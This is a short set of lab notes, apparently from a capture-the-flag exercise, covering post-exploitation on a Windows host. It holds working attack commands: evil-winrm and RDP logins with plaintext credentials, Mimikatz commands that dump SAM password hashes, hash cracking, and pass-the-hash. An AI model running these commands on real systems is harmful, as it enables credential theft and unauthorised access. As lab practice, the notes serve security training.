Post Exploitation

Stabilization and Persistence

evil-winrm -u adot8 -p password1 -i 10.200.101.150

OR RDP

xfreerdp /u:adot8 /p:password1 /v:10.200.101.150 +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

/drive creates a shared drive between you and the machine. Access in file explorer with \\tsclient

Run Mimikatz as Administrator

privilege::debug
token::elevate
log c:\windows\temp\sam.log
lsadump::sam

Use crackstation to crack Thomas's and Arheo5's NTLM hashes

Pass Administrators hash in evil-winrm